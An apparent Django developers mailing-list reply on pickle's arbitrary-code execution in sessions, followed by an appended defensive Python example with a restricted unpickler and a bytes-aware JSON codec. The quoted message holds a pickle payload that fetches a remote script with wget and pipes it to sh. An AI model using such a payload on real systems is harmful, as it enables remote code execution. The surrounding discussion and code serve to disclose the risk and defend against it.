On Oct 2, 2:31 pm, Paul McMillan <p...@mcmillan.ws> wrote:
> data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'"
> import pickle; pickle.loads(data)
>

Some workarounds for Pickle's execution of arbitrary code are proposed
here http://nadiana.com/python-pickle-insecure

Also note one of the comments on that post points out that JSON
converts all strings to unicode, and therefore cannot accurately
restore byte-strings.

I'd have to check through some of my own apps, but I suspect there may
be users who are storing complex Python objects in sessions, whose
code would break if Pickle was dropped.

-- 
You received this message because you are subscribed to the Google Groups 
"Django developers" group.
To post to this group, send email to django-developers@googlegroups.com.
To unsubscribe from this group, send email to 
django-developers+unsubscr...@googlegroups.com.
For more options, visit this group at 
http://groups.google.com/group/django-developers?hl=en.
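The two concerns raised in this message, restricting what `pickle.loads` may import and giving JSON a way to carry byte strings, can be handled in one small serializer module. The following is an added example and is not code from this thread, from the linked nadiana.com post or from Django. `SAFE_GLOBALS`, `BYTES_TAG`, `referenced_globals`, `restricted_loads`, `json_dumps` and `json_loads` are names constructed for this illustration; the `find_class` override follows the "Restricting Globals" pattern in the standard-library `pickle` documentation, and the sample session values are constructed.

```python
"""Hardening session (de)serialization.

Three pieces: a static scan of a pickle's opcode stream (no execution), an
Unpickler that refuses every class not on an allow-list, and a JSON codec that
round-trips byte strings, which plain json.dumps cannot represent.
"""
import base64
import datetime
import decimal
import io
import json
import pickle
import pickletools

# Classes a session is allowed to contain (constructed allow-list). Anything
# else, including os.system from the payload quoted above, is refused.
SAFE_GLOBALS = {
    ("datetime", "date"),
    ("datetime", "datetime"),
    ("decimal", "Decimal"),
}


def referenced_globals(data):
    """Return the (module, name) pairs a pickle would import, found by
    walking its opcodes with pickletools.genops instead of running it.

    Limitation: a module or class-name string that the pickler already
    memoized is emitted as a BINGET, which this scan does not resolve, so
    RestrictedUnpickler below stays the authoritative check.
    """
    found = []
    recent_strings = []  # STACK_GLOBAL pops module and name pushed just before it
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":            # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":    # protocol 4+: two preceding strings
            found.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler whose class lookup only succeeds for SAFE_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def restricted_loads(data):
    """Scan the stream first, then load with the restricted class resolver."""
    for module, name in referenced_globals(data):
        if (module, name) not in SAFE_GLOBALS:
            raise pickle.UnpicklingError(f"pickle references {module}.{name}")
    return RestrictedUnpickler(io.BytesIO(data)).load()


# --- JSON alternative that can still carry byte strings -------------------
BYTES_TAG = "__bytes_b64__"  # constructed marker key for base64-encoded bytes


class BytesAwareEncoder(json.JSONEncoder):
    def default(self, o):
        if isinstance(o, (bytes, bytearray)):
            return {BYTES_TAG: base64.b64encode(bytes(o)).decode("ascii")}
        return super().default(o)


def _restore_bytes(obj):
    # object_hook sees every decoded dict; only the one-key tagged form is bytes
    if len(obj) == 1 and BYTES_TAG in obj:
        return base64.b64decode(obj[BYTES_TAG])
    return obj


def json_dumps(session):
    return json.dumps(session, cls=BytesAwareEncoder, sort_keys=True)


def json_loads(text):
    return json.loads(text, object_hook=_restore_bytes)


def plain_json_keeps_bytes():
    """The limitation noted in the thread: the stdlib encoder has no bytes form."""
    try:
        json.dumps({"k": b"\x00\xff"})
    except TypeError:
        return False
    return True


if __name__ == "__main__":
    legit = pickle.dumps({"expires": datetime.date(2011, 10, 2)})  # constructed
    print(referenced_globals(legit), restricted_loads(legit))
    try:
        restricted_loads(pickle.dumps(datetime.timedelta(days=1)))  # not allowed
    except pickle.UnpicklingError as exc:
        print("refused:", exc)
    text = json_dumps({"csrf": b"\x00\xff", "user": "ana"})  # constructed session
    print(text, json_loads(text), plain_json_keeps_bytes())
```

The allow-list is keyed on `(module, name)` pairs rather than on the class objects themselves so that a session written by an older release of the code still resolves. Because `_restore_bytes` turns any single-key `{"__bytes_b64__": ...}` object into bytes, only decode data your own serializer wrote with this codec; do not apply it to JSON that a client can shape.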